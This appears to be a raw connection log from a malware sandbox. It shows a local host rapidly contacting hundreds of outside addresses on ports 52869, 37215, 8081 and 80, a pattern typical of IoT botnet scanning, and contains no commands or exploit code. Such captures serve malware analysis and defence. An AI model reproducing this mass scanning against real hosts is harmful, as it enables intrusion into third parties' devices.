                                                Jul 20, 2024 23:05:33.069818020 CEST2696652869192.168.2.1443.17.220.252
                                                Jul 20, 2024 23:05:33.069818974 CEST2696652869192.168.2.1463.64.228.61
                                                Jul 20, 2024 23:05:33.069818974 CEST2696652869192.168.2.1469.114.150.243
                                                Jul 20, 2024 23:05:33.069818974 CEST2696652869192.168.2.14168.136.146.42
                                                Jul 20, 2024 23:05:33.069818974 CEST2696652869192.168.2.1472.61.200.94
                                                Jul 20, 2024 23:05:33.069818974 CEST2696652869192.168.2.14137.241.27.168
                                                Jul 20, 2024 23:05:33.069818974 CEST2696652869192.168.2.14110.7.210.131
                                                Jul 20, 2024 23:05:33.069996119 CEST8027478112.139.126.189192.168.2.14
                                                Jul 20, 2024 23:05:33.070138931 CEST8027478112.205.1.234192.168.2.14
                                                Jul 20, 2024 23:05:33.070207119 CEST2696652869192.168.2.1434.249.74.137
                                                Jul 20, 2024 23:05:33.070207119 CEST2696652869192.168.2.14187.140.79.68
                                                Jul 20, 2024 23:05:33.070207119 CEST2696652869192.168.2.14161.40.243.96
                                                Jul 20, 2024 23:05:33.070207119 CEST2696652869192.168.2.14149.11.140.219
                                                Jul 20, 2024 23:05:33.070207119 CEST2696652869192.168.2.14178.148.241.110
                                                Jul 20, 2024 23:05:33.070207119 CEST2696652869192.168.2.14173.166.204.159
                                                Jul 20, 2024 23:05:33.070235968 CEST2696652869192.168.2.1435.111.57.152
                                                Jul 20, 2024 23:05:33.070235968 CEST2696652869192.168.2.1453.255.183.182
                                                Jul 20, 2024 23:05:33.070235968 CEST2696652869192.168.2.14213.226.6.135
                                                Jul 20, 2024 23:05:33.070235968 CEST2696652869192.168.2.1472.206.115.178
                                                Jul 20, 2024 23:05:33.070235968 CEST2696652869192.168.2.14213.35.244.167
                                                Jul 20, 2024 23:05:33.070235968 CEST2696652869192.168.2.149.239.190.228
                                                Jul 20, 2024 23:05:33.070235968 CEST2696652869192.168.2.1435.140.139.234
                                                Jul 20, 2024 23:05:33.070235968 CEST2696652869192.168.2.14107.160.177.153
                                                Jul 20, 2024 23:05:33.070436001 CEST8027478112.143.165.166192.168.2.14
                                                Jul 20, 2024 23:05:33.070583105 CEST8027478112.12.2.187192.168.2.14
                                                Jul 20, 2024 23:05:33.070589066 CEST8027478112.127.88.16192.168.2.14
                                                Jul 20, 2024 23:05:33.070717096 CEST8027478112.172.72.75192.168.2.14
                                                Jul 20, 2024 23:05:33.070863008 CEST8027478112.199.85.114192.168.2.14
                                                Jul 20, 2024 23:05:33.070868969 CEST8027478112.181.134.38192.168.2.14
                                                Jul 20, 2024 23:05:33.070873976 CEST8027478112.216.253.115192.168.2.14
                                                Jul 20, 2024 23:05:33.070884943 CEST8027478112.36.100.39192.168.2.14
                                                Jul 20, 2024 23:05:33.070888996 CEST803763295.119.118.209192.168.2.14
                                                Jul 20, 2024 23:05:33.071007967 CEST3763280192.168.2.1495.119.118.209
                                                Jul 20, 2024 23:05:33.071080923 CEST2696652869192.168.2.1470.217.44.207
                                                Jul 20, 2024 23:05:33.071080923 CEST2696652869192.168.2.14131.215.87.177
                                                Jul 20, 2024 23:05:33.071080923 CEST2696652869192.168.2.142.146.189.137
                                                Jul 20, 2024 23:05:33.071080923 CEST2696652869192.168.2.1445.25.153.64
                                                Jul 20, 2024 23:05:33.071080923 CEST2696652869192.168.2.14117.59.127.46
                                                Jul 20, 2024 23:05:33.071080923 CEST2696652869192.168.2.149.38.18.146
                                                Jul 20, 2024 23:05:33.071080923 CEST2696652869192.168.2.14183.19.109.104
                                                Jul 20, 2024 23:05:33.071170092 CEST8027478112.97.254.104192.168.2.14
                                                Jul 20, 2024 23:05:33.071176052 CEST8027478112.225.157.1192.168.2.14
                                                Jul 20, 2024 23:05:33.071228981 CEST2696652869192.168.2.1481.169.73.77
                                                Jul 20, 2024 23:05:33.071228981 CEST2696652869192.168.2.14108.14.43.116
                                                Jul 20, 2024 23:05:33.071228981 CEST2747880192.168.2.14112.230.48.95
                                                Jul 20, 2024 23:05:33.071228981 CEST5913852869192.168.2.14145.229.168.132
                                                Jul 20, 2024 23:05:33.071228981 CEST2747880192.168.2.14112.6.22.42
                                                Jul 20, 2024 23:05:33.071228981 CEST2747880192.168.2.14112.50.18.202
                                                Jul 20, 2024 23:05:33.071229935 CEST2747880192.168.2.14112.121.191.90
                                                Jul 20, 2024 23:05:33.071285009 CEST2696652869192.168.2.141.239.9.16
                                                Jul 20, 2024 23:05:33.071285009 CEST2696652869192.168.2.14179.164.186.218
                                                Jul 20, 2024 23:05:33.071285009 CEST2696652869192.168.2.14140.37.208.12
                                                Jul 20, 2024 23:05:33.071285009 CEST2696652869192.168.2.1424.174.103.14
                                                Jul 20, 2024 23:05:33.071285009 CEST2696652869192.168.2.1459.150.30.0
                                                Jul 20, 2024 23:05:33.071285009 CEST587428081192.168.2.14117.202.144.121
                                                Jul 20, 2024 23:05:33.071285009 CEST2747880192.168.2.14112.135.178.54
                                                Jul 20, 2024 23:05:33.071285009 CEST2747880192.168.2.14112.12.255.58
                                                Jul 20, 2024 23:05:33.071310043 CEST2696652869192.168.2.1464.0.134.204
                                                Jul 20, 2024 23:05:33.071310043 CEST2696652869192.168.2.14210.239.174.13
                                                Jul 20, 2024 23:05:33.071310043 CEST2696652869192.168.2.1472.99.131.245
                                                Jul 20, 2024 23:05:33.071310043 CEST2696652869192.168.2.14188.231.197.28
                                                Jul 20, 2024 23:05:33.071310043 CEST2696652869192.168.2.14211.75.101.6
                                                Jul 20, 2024 23:05:33.071310043 CEST2696652869192.168.2.14203.56.117.87
                                                Jul 20, 2024 23:05:33.071310043 CEST2696652869192.168.2.14201.231.16.57
                                                Jul 20, 2024 23:05:33.071310043 CEST2696652869192.168.2.14198.144.40.88
                                                Jul 20, 2024 23:05:33.071365118 CEST8027478112.150.38.203192.168.2.14
                                                Jul 20, 2024 23:05:33.071482897 CEST8027478112.145.134.55192.168.2.14
                                                Jul 20, 2024 23:05:33.071492910 CEST8027478112.226.82.64192.168.2.14
                                                Jul 20, 2024 23:05:33.071497917 CEST8027478112.241.169.168192.168.2.14
                                                Jul 20, 2024 23:05:33.071508884 CEST8027478112.156.17.209192.168.2.14
                                                Jul 20, 2024 23:05:33.071613073 CEST2696652869192.168.2.1448.204.105.67
                                                Jul 20, 2024 23:05:33.071613073 CEST2696652869192.168.2.1434.182.221.255
                                                Jul 20, 2024 23:05:33.071613073 CEST2696652869192.168.2.14105.32.69.188
                                                Jul 20, 2024 23:05:33.071613073 CEST2696652869192.168.2.14132.199.182.97
                                                Jul 20, 2024 23:05:33.071613073 CEST2696652869192.168.2.14155.220.126.86
                                                Jul 20, 2024 23:05:33.071613073 CEST2696652869192.168.2.14134.9.122.61
                                                Jul 20, 2024 23:05:33.071614027 CEST2696652869192.168.2.14173.228.241.145
                                                Jul 20, 2024 23:05:33.071614027 CEST2696652869192.168.2.1481.33.209.177
                                                Jul 20, 2024 23:05:33.071629047 CEST8027478112.250.199.247192.168.2.14
                                                Jul 20, 2024 23:05:33.071918011 CEST8027478112.245.139.121192.168.2.14
                                                Jul 20, 2024 23:05:33.071923971 CEST8027478112.93.127.38192.168.2.14
                                                Jul 20, 2024 23:05:33.072060108 CEST2696652869192.168.2.14156.2.219.15
                                                Jul 20, 2024 23:05:33.072060108 CEST2696652869192.168.2.1498.235.63.122
                                                Jul 20, 2024 23:05:33.072060108 CEST2696652869192.168.2.1462.72.98.253
                                                Jul 20, 2024 23:05:33.072060108 CEST2696652869192.168.2.14133.176.188.67
                                                Jul 20, 2024 23:05:33.072060108 CEST2696652869192.168.2.14137.85.222.73
                                                Jul 20, 2024 23:05:33.072060108 CEST2696652869192.168.2.1486.79.14.115
                                                Jul 20, 2024 23:05:33.072060108 CEST2696652869192.168.2.1498.123.162.170
                                                Jul 20, 2024 23:05:33.072439909 CEST2747880192.168.2.14112.49.227.154
                                                Jul 20, 2024 23:05:33.072439909 CEST2747880192.168.2.14112.198.135.230
                                                Jul 20, 2024 23:05:33.072439909 CEST2747880192.168.2.14112.14.19.110
                                                Jul 20, 2024 23:05:33.072439909 CEST2747880192.168.2.14112.118.200.196
                                                Jul 20, 2024 23:05:33.072439909 CEST2747880192.168.2.14112.103.2.63
                                                Jul 20, 2024 23:05:33.072439909 CEST2747880192.168.2.14112.151.42.78
                                                Jul 20, 2024 23:05:33.072439909 CEST2747880192.168.2.14112.0.61.161
                                                Jul 20, 2024 23:05:33.072439909 CEST2747880192.168.2.14112.1.241.34
                                                Jul 20, 2024 23:05:33.072525024 CEST2696652869192.168.2.14196.146.29.209
                                                Jul 20, 2024 23:05:33.072525024 CEST2696652869192.168.2.1438.111.238.210
                                                Jul 20, 2024 23:05:33.072525024 CEST2696652869192.168.2.14103.5.63.70
                                                Jul 20, 2024 23:05:33.072525024 CEST2696652869192.168.2.14150.146.100.84
                                                Jul 20, 2024 23:05:33.072525024 CEST2696652869192.168.2.1418.16.141.95
                                                Jul 20, 2024 23:05:33.072525024 CEST2696652869192.168.2.1459.227.4.98
                                                Jul 20, 2024 23:05:33.072525024 CEST2696652869192.168.2.14126.143.144.129
                                                Jul 20, 2024 23:05:33.072525024 CEST2696652869192.168.2.14135.69.52.22
                                                Jul 20, 2024 23:05:33.072541952 CEST8027478112.39.185.53192.168.2.14
                                                Jul 20, 2024 23:05:33.072814941 CEST2696652869192.168.2.14140.45.124.85
                                                Jul 20, 2024 23:05:33.072814941 CEST2696652869192.168.2.14175.118.93.38
                                                Jul 20, 2024 23:05:33.072814941 CEST2696652869192.168.2.141.90.234.200
                                                Jul 20, 2024 23:05:33.072814941 CEST2696652869192.168.2.14149.68.156.54
                                                Jul 20, 2024 23:05:33.072814941 CEST2696652869192.168.2.14163.117.175.205
                                                Jul 20, 2024 23:05:33.072814941 CEST2696652869192.168.2.14206.246.225.132
                                                Jul 20, 2024 23:05:33.072814941 CEST2747880192.168.2.14112.4.21.98
                                                Jul 20, 2024 23:05:33.072814941 CEST2747880192.168.2.14112.227.28.160
                                                Jul 20, 2024 23:05:33.072828054 CEST8027478112.81.241.92192.168.2.14
                                                Jul 20, 2024 23:05:33.072865963 CEST2747880192.168.2.14112.207.103.168
                                                Jul 20, 2024 23:05:33.072865963 CEST2747880192.168.2.14112.201.249.164
                                                Jul 20, 2024 23:05:33.072865963 CEST2747880192.168.2.14112.249.237.106
                                                Jul 20, 2024 23:05:33.072865963 CEST2747880192.168.2.14112.112.170.29
                                                Jul 20, 2024 23:05:33.072865963 CEST2747880192.168.2.14112.53.81.29
                                                Jul 20, 2024 23:05:33.072865963 CEST2747880192.168.2.14112.167.244.83
                                                Jul 20, 2024 23:05:33.072865963 CEST2747880192.168.2.14112.59.116.132
                                                Jul 20, 2024 23:05:33.072865963 CEST2747880192.168.2.14112.156.156.146
                                                Jul 20, 2024 23:05:33.072901011 CEST4234037215192.168.2.14197.112.26.200
                                                Jul 20, 2024 23:05:33.072973013 CEST8027478112.222.69.172192.168.2.14
                                                Jul 20, 2024 23:05:33.072978973 CEST8027478112.11.222.107192.168.2.14
                                                Jul 20, 2024 23:05:33.073108912 CEST8027478112.58.22.87192.168.2.14
                                                Jul 20, 2024 23:05:33.073190928 CEST437108081192.168.2.14107.98.138.138
                                                Jul 20, 2024 23:05:33.073190928 CEST2747880192.168.2.14112.205.1.234
                                                Jul 20, 2024 23:05:33.073190928 CEST2747880192.168.2.14112.12.2.187
                                                Jul 20, 2024 23:05:33.073190928 CEST2747880192.168.2.14112.199.85.114
                                                Jul 20, 2024 23:05:33.073190928 CEST2747880192.168.2.14112.216.253.115
                                                Jul 20, 2024 23:05:33.073190928 CEST2747880192.168.2.14112.226.82.64
                                                Jul 20, 2024 23:05:33.073190928 CEST2747880192.168.2.14112.250.199.247
                                                Jul 20, 2024 23:05:33.073190928 CEST2747880192.168.2.14112.245.139.121
                                                Jul 20, 2024 23:05:33.073218107 CEST2696652869192.168.2.14195.58.12.108
                                                Jul 20, 2024 23:05:33.073218107 CEST2696652869192.168.2.1495.131.13.41
                                                Jul 20, 2024 23:05:33.073218107 CEST2696652869192.168.2.14216.7.65.228
                                                Jul 20, 2024 23:05:33.073218107 CEST2696652869192.168.2.14125.45.195.184
                                                Jul 20, 2024 23:05:33.073218107 CEST2696652869192.168.2.14117.181.194.56
                                                Jul 20, 2024 23:05:33.073218107 CEST2696652869192.168.2.1439.136.210.188
                                                Jul 20, 2024 23:05:33.073218107 CEST2696652869192.168.2.1420.132.88.148
                                                Jul 20, 2024 23:05:33.073218107 CEST2696652869192.168.2.14122.47.93.115
                                                Jul 20, 2024 23:05:33.073256016 CEST8027478112.249.243.236192.168.2.14
                                                Jul 20, 2024 23:05:33.073499918 CEST2696652869192.168.2.14207.16.112.177
                                                Jul 20, 2024 23:05:33.073499918 CEST2696652869192.168.2.1477.198.66.150
                                                Jul 20, 2024 23:05:33.073499918 CEST2696652869192.168.2.14197.172.132.134
                                                Jul 20, 2024 23:05:33.073499918 CEST2696652869192.168.2.1494.121.100.248
                                                Jul 20, 2024 23:05:33.073499918 CEST2696652869192.168.2.1479.66.81.25
                                                Jul 20, 2024 23:05:33.073499918 CEST2696652869192.168.2.14166.147.34.14
                                                Jul 20, 2024 23:05:33.073499918 CEST2696652869192.168.2.14206.102.43.209
                                                Jul 20, 2024 23:05:33.073499918 CEST2696652869192.168.2.14101.89.39.240
                                                Jul 20, 2024 23:05:33.073539972 CEST8027478112.27.185.63192.168.2.14
                                                Jul 20, 2024 23:05:33.073641062 CEST2747880192.168.2.14112.244.3.43
                                                Jul 20, 2024 23:05:33.073641062 CEST2747880192.168.2.14112.68.0.197
                                                Jul 20, 2024 23:05:33.073641062 CEST2747880192.168.2.14112.242.249.115
                                                Jul 20, 2024 23:05:33.073641062 CEST2747880192.168.2.14112.128.88.114
                                                Jul 20, 2024 23:05:33.073641062 CEST2747880192.168.2.14112.121.83.66
                                                Jul 20, 2024 23:05:33.073641062 CEST2747880192.168.2.14112.100.88.23
                                                Jul 20, 2024 23:05:33.073641062 CEST2747880192.168.2.14112.100.238.33
                                                Jul 20, 2024 23:05:33.073642015 CEST2747880192.168.2.14112.196.196.112
                                                Jul 20, 2024 23:05:33.073791027 CEST8027478112.239.97.57192.168.2.14
                                                Jul 20, 2024 23:05:33.073987961 CEST2747880192.168.2.14112.91.26.146
                                                Jul 20, 2024 23:05:33.073987961 CEST2747880192.168.2.14112.28.245.27
                                                Jul 20, 2024 23:05:33.073987961 CEST2747880192.168.2.14112.69.254.170
                                                Jul 20, 2024 23:05:33.073987961 CEST2747880192.168.2.14112.178.137.80
                                                Jul 20, 2024 23:05:33.073987961 CEST2747880192.168.2.14112.40.70.109
                                                Jul 20, 2024 23:05:33.073987961 CEST2747880192.168.2.14112.80.80.155
                                                Jul 20, 2024 23:05:33.073987961 CEST2747880192.168.2.14112.91.135.215
                                                Jul 20, 2024 23:05:33.073987961 CEST2747880192.168.2.14112.59.145.113
                                                Jul 20, 2024 23:05:33.074019909 CEST2747880192.168.2.14112.93.127.38
                                                Jul 20, 2024 23:05:33.074019909 CEST481848081192.168.2.14122.148.141.139
                                                Jul 20, 2024 23:05:33.074210882 CEST2696652869192.168.2.1424.157.233.219
                                                Jul 20, 2024 23:05:33.074210882 CEST2696652869192.168.2.14208.165.87.80
                                                Jul 20, 2024 23:05:33.074210882 CEST2696652869192.168.2.14192.194.56.10
                                                Jul 20, 2024 23:05:33.074210882 CEST2696652869192.168.2.14125.72.138.76
                                                Jul 20, 2024 23:05:33.074210882 CEST2696652869192.168.2.1487.121.74.188
                                                Jul 20, 2024 23:05:33.074210882 CEST2696652869192.168.2.14180.186.160.26
                                                Jul 20, 2024 23:05:33.074368000 CEST2747880192.168.2.14112.227.126.110
                                                Jul 20, 2024 23:05:33.074368000 CEST2747880192.168.2.14112.127.95.19
                                                Jul 20, 2024 23:05:33.074368000 CEST2747880192.168.2.14112.2.64.118
                                                Jul 20, 2024 23:05:33.074368000 CEST2747880192.168.2.14112.18.230.169
                                                Jul 20, 2024 23:05:33.074368000 CEST2747880192.168.2.14112.144.74.191
                                                Jul 20, 2024 23:05:33.074445963 CEST2696652869192.168.2.14205.58.123.5
                                                Jul 20, 2024 23:05:33.074445963 CEST2696652869192.168.2.14153.27.251.6
                                                Jul 20, 2024 23:05:33.074445963 CEST2696652869192.168.2.14153.187.111.58
                                                Jul 20, 2024 23:05:33.074445963 CEST2696652869192.168.2.1452.21.33.116
                                                Jul 20, 2024 23:05:33.074445963 CEST2696652869192.168.2.14211.127.230.111
                                                Jul 20, 2024 23:05:33.074445963 CEST2696652869192.168.2.14197.172.172.172
                                                Jul 20, 2024 23:05:33.074446917 CEST2696652869192.168.2.14178.111.133.26
                                                Jul 20, 2024 23:05:33.074446917 CEST2696652869192.168.2.14186.130.210.50
                                                Jul 20, 2024 23:05:33.074583054 CEST2747880192.168.2.14112.120.212.189
                                                Jul 20, 2024 23:05:33.074583054 CEST2747880192.168.2.14112.35.156.109
                                                Jul 20, 2024 23:05:33.074583054 CEST2747880192.168.2.14112.168.192.109
                                                Jul 20, 2024 23:05:33.074583054 CEST2747880192.168.2.14112.104.164.227
                                                Jul 20, 2024 23:05:33.074634075 CEST2696652869192.168.2.14134.178.15.155
                                                Jul 20, 2024 23:05:33.074634075 CEST2696652869192.168.2.14158.77.24.127
                                                Jul 20, 2024 23:05:33.074634075 CEST2696652869192.168.2.14192.47.114.54
                                                Jul 20, 2024 23:05:33.074634075 CEST2696652869192.168.2.14142.184.113.112
                                                Jul 20, 2024 23:05:33.074634075 CEST2696652869192.168.2.14184.149.167.202
                                                Jul 20, 2024 23:05:33.074634075 CEST2696652869192.168.2.1452.157.156.150
                                                Jul 20, 2024 23:05:33.074634075 CEST4454437215192.168.2.14197.70.47.135
                                                Jul 20, 2024 23:05:33.074634075 CEST2747880192.168.2.14112.167.150.105
                                                Jul 20, 2024 23:05:33.074798107 CEST2696652869192.168.2.14103.221.230.248
                                                Jul 20, 2024 23:05:33.074798107 CEST2696652869192.168.2.14201.119.244.156
                                                Jul 20, 2024 23:05:33.074798107 CEST2696652869192.168.2.14195.50.250.15
                                                Jul 20, 2024 23:05:33.074798107 CEST2696652869192.168.2.1490.220.223.3
                                                Jul 20, 2024 23:05:33.074798107 CEST2696652869192.168.2.1440.10.56.22
                                                Jul 20, 2024 23:05:33.074798107 CEST2696652869192.168.2.144.131.129.231
                                                Jul 20, 2024 23:05:33.074798107 CEST2696652869192.168.2.14143.224.237.76
                                                Jul 20, 2024 23:05:33.074798107 CEST2696652869192.168.2.1454.110.26.167
                                                Jul 20, 2024 23:05:33.074973106 CEST2747880192.168.2.14112.159.31.135
                                                Jul 20, 2024 23:05:33.074973106 CEST2747880192.168.2.14112.122.99.216
                                                Jul 20, 2024 23:05:33.074973106 CEST2747880192.168.2.14112.13.79.12
                                                Jul 20, 2024 23:05:33.074973106 CEST2747880192.168.2.14112.144.216.178
                                                Jul 20, 2024 23:05:33.074973106 CEST2747880192.168.2.14112.95.52.49
                                                Jul 20, 2024 23:05:33.074973106 CEST2747880192.168.2.14112.172.140.128
                                                Jul 20, 2024 23:05:33.074973106 CEST2747880192.168.2.14112.60.227.67
                                                Jul 20, 2024 23:05:33.074973106 CEST2747880192.168.2.14112.178.127.249
                                                Jul 20, 2024 23:05:33.074975967 CEST372155536631.226.75.152192.168.2.14
                                                Jul 20, 2024 23:05:33.074990988 CEST2696652869192.168.2.1447.196.255.231
                                                Jul 20, 2024 23:05:33.074990988 CEST2696652869192.168.2.14193.240.221.66
                                                Jul 20, 2024 23:05:33.074990988 CEST2696652869192.168.2.14190.36.45.109
                                                Jul 20, 2024 23:05:33.074990988 CEST2696652869192.168.2.141.200.60.254
                                                Jul 20, 2024 23:05:33.074991941 CEST2696652869192.168.2.14112.43.125.142
                                                Jul 20, 2024 23:05:33.074991941 CEST5407480192.168.2.1495.17.124.99
                                                Jul 20, 2024 23:05:33.074991941 CEST2747880192.168.2.14112.198.31.194
                                                Jul 20, 2024 23:05:33.074991941 CEST2747880192.168.2.14112.185.231.165
                                                Jul 20, 2024 23:05:33.075014114 CEST5536637215192.168.2.1431.226.75.152
                                                Jul 20, 2024 23:05:33.075124025 CEST2747880192.168.2.14112.55.225.102
                                                Jul 20, 2024 23:05:33.075124025 CEST2747880192.168.2.14112.103.31.238
                                                Jul 20, 2024 23:05:33.075124025 CEST2747880192.168.2.14112.39.232.117
                                                Jul 20, 2024 23:05:33.075124025 CEST2747880192.168.2.14112.172.72.75
                                                Jul 20, 2024 23:05:33.075124025 CEST2747880192.168.2.14112.97.254.104
                                                Jul 20, 2024 23:05:33.075124025 CEST2747880192.168.2.14112.225.157.1
                                                Jul 20, 2024 23:05:33.075124025 CEST2747880192.168.2.14112.150.38.203
                                                Jul 20, 2024 23:05:33.075145960 CEST2747880192.168.2.14112.132.143.141
                                                Jul 20, 2024 23:05:33.075145960 CEST2747880192.168.2.14112.118.65.203
                                                Jul 20, 2024 23:05:33.075145960 CEST2747880192.168.2.14112.95.173.160
                                                Jul 20, 2024 23:05:33.075145960 CEST2747880192.168.2.14112.10.91.60
                                                Jul 20, 2024 23:05:33.075145960 CEST2747880192.168.2.14112.250.180.151
                                                Jul 20, 2024 23:05:33.075145960 CEST2747880192.168.2.14112.73.198.158
                                                Jul 20, 2024 23:05:33.075207949 CEST2747880192.168.2.14112.156.17.209
                                                Jul 20, 2024 23:05:33.075207949 CEST2747880192.168.2.14112.39.185.53
                                                Jul 20, 2024 23:05:33.075207949 CEST2747880192.168.2.14112.81.241.92
                                                Jul 20, 2024 23:05:33.075207949 CEST2747880192.168.2.14112.222.69.172
                                                Jul 20, 2024 23:05:33.075207949 CEST2747880192.168.2.14112.11.222.107
                                                Jul 20, 2024 23:05:33.075207949 CEST2747880192.168.2.14112.58.22.87
                                                Jul 20, 2024 23:05:33.075207949 CEST2747880192.168.2.14112.249.243.236
                                                Jul 20, 2024 23:05:33.075207949 CEST2747880192.168.2.14112.27.185.63
                                                Jul 20, 2024 23:05:33.075226068 CEST2747880192.168.2.14112.149.242.219
                                                Jul 20, 2024 23:05:33.075226068 CEST2747880192.168.2.14112.153.127.241
                                                Jul 20, 2024 23:05:33.075226068 CEST2747880192.168.2.14112.162.77.38
                                                Jul 20, 2024 23:05:33.075226068 CEST2747880192.168.2.14112.36.165.223
                                                Jul 20, 2024 23:05:33.075226068 CEST2747880192.168.2.14112.139.126.189
                                                Jul 20, 2024 23:05:33.075226068 CEST3775052869192.168.2.1468.251.134.43
                                                Jul 20, 2024 23:05:33.075226068 CEST2747880192.168.2.14112.143.165.166
                                                Jul 20, 2024 23:05:33.075226068 CEST2747880192.168.2.14112.127.88.16
                                                Jul 20, 2024 23:05:33.075274944 CEST2747880192.168.2.14112.239.97.57
                                                Jul 20, 2024 23:05:33.075274944 CEST3784480192.168.2.1495.189.164.11
                                                Jul 20, 2024 23:05:33.075280905 CEST2747880192.168.2.14112.181.134.38
                                                Jul 20, 2024 23:05:33.075280905 CEST2747880192.168.2.14112.36.100.39
                                                Jul 20, 2024 23:05:33.075280905 CEST2747880192.168.2.14112.145.134.55
                                                Jul 20, 2024 23:05:33.075280905 CEST2747880192.168.2.14112.241.169.168
                                                Jul 20, 2024 23:05:33.075840950 CEST803466295.59.134.24192.168.2.14
                                                Jul 20, 2024 23:05:33.075906038 CEST3466280192.168.2.1495.59.134.24
                                                Jul 20, 2024 23:05:33.077939034 CEST5524637215192.168.2.14197.23.105.2
                                                Jul 20, 2024 23:05:33.078620911 CEST808158742117.202.144.121192.168.2.14
                                                Jul 20, 2024 23:05:33.078668118 CEST349288081192.168.2.14124.0.116.151
                                                Jul 20, 2024 23:05:33.078699112 CEST587428081192.168.2.14117.202.144.121
                                                Jul 20, 2024 23:05:33.078802109 CEST3304452869192.168.2.14157.223.126.25
                                                Jul 20, 2024 23:05:33.079037905 CEST5286959138145.229.168.132192.168.2.14
                                                Jul 20, 2024 23:05:33.079165936 CEST3720480192.168.2.1495.61.168.150
                                                Jul 20, 2024 23:05:33.079185963 CEST5913852869192.168.2.14145.229.168.132
                                                Jul 20, 2024 23:05:33.079341888 CEST3721542340197.112.26.200192.168.2.14
                                                Jul 20, 2024 23:05:33.079421997 CEST4234037215192.168.2.14197.112.26.200
                                                Jul 20, 2024 23:05:33.079771996 CEST808143710107.98.138.138192.168.2.14
                                                Jul 20, 2024 23:05:33.079814911 CEST437108081192.168.2.14107.98.138.138
                                                Jul 20, 2024 23:05:33.080497026 CEST808148184122.148.141.139192.168.2.14
                                                Jul 20, 2024 23:05:33.080534935 CEST481848081192.168.2.14122.148.141.139
                                                Jul 20, 2024 23:05:33.081520081 CEST4729437215192.168.2.14186.23.77.122
                                                Jul 20, 2024 23:05:33.081866026 CEST3721544544197.70.47.135192.168.2.14
                                                Jul 20, 2024 23:05:33.081912041 CEST4454437215192.168.2.14197.70.47.135
                                                Jul 20, 2024 23:05:33.082170963 CEST805407495.17.124.99192.168.2.14
                                                Jul 20, 2024 23:05:33.082180023 CEST528693775068.251.134.43192.168.2.14
                                                Jul 20, 2024 23:05:33.082185984 CEST803784495.189.164.11192.168.2.14
                                                Jul 20, 2024 23:05:33.082216024 CEST5407480192.168.2.1495.17.124.99
                                                Jul 20, 2024 23:05:33.082216024 CEST3775052869192.168.2.1468.251.134.43
                                                Jul 20, 2024 23:05:33.082252979 CEST3784480192.168.2.1495.189.164.11
                                                Jul 20, 2024 23:05:33.083457947 CEST5620080192.168.2.1495.100.201.122
                                                Jul 20, 2024 23:05:33.083827972 CEST572128081192.168.2.14173.99.45.184
                                                Jul 20, 2024 23:05:33.084294081 CEST3721555246197.23.105.2192.168.2.14
                                                Jul 20, 2024 23:05:33.084503889 CEST5524637215192.168.2.14197.23.105.2
                                                Jul 20, 2024 23:05:33.085087061 CEST808134928124.0.116.151192.168.2.14
                                                Jul 20, 2024 23:05:33.085131884 CEST349288081192.168.2.14124.0.116.151
                                                Jul 20, 2024 23:05:33.085442066 CEST5286933044157.223.126.25192.168.2.14
                                                Jul 20, 2024 23:05:33.085448027 CEST803720495.61.168.150192.168.2.14
                                                Jul 20, 2024 23:05:33.085544109 CEST3720480192.168.2.1495.61.168.150
                                                Jul 20, 2024 23:05:33.085546970 CEST3304452869192.168.2.14157.223.126.25
                                                Jul 20, 2024 23:05:33.087640047 CEST4484637215192.168.2.14197.206.89.130
                                                Jul 20, 2024 23:05:33.087963104 CEST3721547294186.23.77.122192.168.2.14
                                                Jul 20, 2024 23:05:33.088007927 CEST4729437215192.168.2.14186.23.77.122
                                                Jul 20, 2024 23:05:33.088783979 CEST581088081192.168.2.14213.86.105.34
                                                Jul 20, 2024 23:05:33.088876963 CEST4992252869192.168.2.1451.156.205.139
                                                Jul 20, 2024 23:05:33.089538097 CEST805620095.100.201.122192.168.2.14
                                                Jul 20, 2024 23:05:33.089601994 CEST4575880192.168.2.1495.236.83.119
                                                Jul 20, 2024 23:05:33.089601994 CEST5620080192.168.2.1495.100.201.122
                                                Jul 20, 2024 23:05:33.090092897 CEST808157212173.99.45.184192.168.2.14
                                                Jul 20, 2024 23:05:33.090311050 CEST572128081192.168.2.14173.99.45.184
                                                Jul 20, 2024 23:05:33.093460083 CEST3721544846197.206.89.130192.168.2.14
                                                Jul 20, 2024 23:05:33.093502998 CEST4484637215192.168.2.14197.206.89.130
                                                Jul 20, 2024 23:05:33.093630075 CEST3562637215192.168.2.1475.49.195.139
                                                Jul 20, 2024 23:05:33.093633890 CEST808158108213.86.105.34192.168.2.14
                                                Jul 20, 2024 23:05:33.093640089 CEST528694992251.156.205.139192.168.2.14
                                                Jul 20, 2024 23:05:33.093682051 CEST4992252869192.168.2.1451.156.205.139
                                                Jul 20, 2024 23:05:33.093702078 CEST581088081192.168.2.14213.86.105.34
                                                Jul 20, 2024 23:05:33.094434023 CEST804575895.236.83.119192.168.2.14
                                                Jul 20, 2024 23:05:33.094666958 CEST598728081192.168.2.14124.201.188.99
                                                Jul 20, 2024 23:05:33.094688892 CEST4575880192.168.2.1495.236.83.119
                                                Jul 20, 2024 23:05:33.095279932 CEST3914280192.168.2.1495.220.228.215
                                                Jul 20, 2024 23:05:33.097919941 CEST3594837215192.168.2.14157.153.42.4
                                                Jul 20, 2024 23:05:33.098467112 CEST372153562675.49.195.139192.168.2.14
                                                Jul 20, 2024 23:05:33.098511934 CEST3562637215192.168.2.1475.49.195.139
                                                Jul 20, 2024 23:05:33.098839045 CEST575648081192.168.2.1414.227.196.59
                                                Jul 20, 2024 23:05:33.098946095 CEST5536052869192.168.2.14176.224.174.174
                                                Jul 20, 2024 23:05:33.099473000 CEST808159872124.201.188.99192.168.2.14
                                                Jul 20, 2024 23:05:33.099534035 CEST5495880192.168.2.1495.85.128.197
                                                Jul 20, 2024 23:05:33.099559069 CEST598728081192.168.2.14124.201.188.99
                                                Jul 20, 2024 23:05:33.100074053 CEST803914295.220.228.215192.168.2.14
                                                Jul 20, 2024 23:05:33.100117922 CEST3914280192.168.2.1495.220.228.215
                                                Jul 20, 2024 23:05:33.102734089 CEST3721535948157.153.42.4192.168.2.14
                                                Jul 20, 2024 23:05:33.102785110 CEST3594837215192.168.2.14157.153.42.4
                                                Jul 20, 2024 23:05:33.103657007 CEST80815756414.227.196.59192.168.2.14
                                                Jul 20, 2024 23:05:33.103714943 CEST575648081192.168.2.1414.227.196.59
                                                Jul 20, 2024 23:05:33.103741884 CEST5286955360176.224.174.174192.168.2.14
                                                Jul 20, 2024 23:05:33.103813887 CEST5536052869192.168.2.14176.224.174.174
                                                Jul 20, 2024 23:05:33.104331970 CEST805495895.85.128.197192.168.2.14
                                                Jul 20, 2024 23:05:33.104379892 CEST5495880192.168.2.1495.85.128.197
